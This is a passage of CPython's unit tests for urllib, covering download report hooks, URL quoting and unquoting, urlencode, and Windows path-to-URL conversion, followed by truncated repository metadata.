def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded by with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32' or sys.platform == 'uwp',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request..url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "e8bfc066902919e7af9614b6212d158b",
"timestamp": "",
"source": "github",
"line_count": 1483,
"max_line_length": 108,
"avg_line_length": 40.49359406608227,
"alnum_prop": 0.5702058216212615,
"repo_name": "ms-iot/python",
"id": "28fe21be817275616bca2f1e9672a119fb400e1f",
"size": "60052",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "cpython/Lib/test/test_urllib.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "481852"
},
{
"name": "Batchfile",
"bytes": "35616"
},
{
"name": "C",
"bytes": "15555469"
},
{
"name": "C#",
"bytes": "1231"
},
{
"name": "C++",
"bytes": "726292"
},
{
"name": "CSS",
"bytes": "2839"
},
{
"name": "Common Lisp",
